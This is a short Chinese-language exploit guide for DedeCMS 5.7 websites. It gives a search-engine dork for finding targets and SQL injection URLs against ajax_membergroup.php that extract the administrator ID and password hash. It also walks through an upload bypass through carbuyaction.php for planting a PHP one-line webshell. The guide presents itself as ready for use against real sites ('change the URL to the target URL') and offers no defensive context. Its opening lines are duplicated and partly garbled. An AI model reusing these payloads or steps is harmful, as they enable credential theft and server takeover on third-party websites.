漏洞描述：百度搜索关键字powered by dedecmsv57_gbk 2004-2011 desdev inc，获得使用dedecms系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间，然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面， 然后访问/
漏洞描述：百度搜索关键字“powered by dedecmsv57_gbk 2004-2011 desdev inc”，获得使用dedecms系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
/member/ajax_membergroup.php?action=post&membergroup=@`'` union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码
得到的是19位的，去掉前三位和最后一位，得到管理员的16位md5
上传漏洞。要求网站开启新会员注册功能，首先注册新会员，无需通过邮件验证，
只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid =s-p0rn8888&rs[code]=../dialog/select_soft_post”
说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
file:
newname:
提交
把url改成目标url就行了。还有个全局变量提交，绕过注册的可以去黑防2月刊上面看。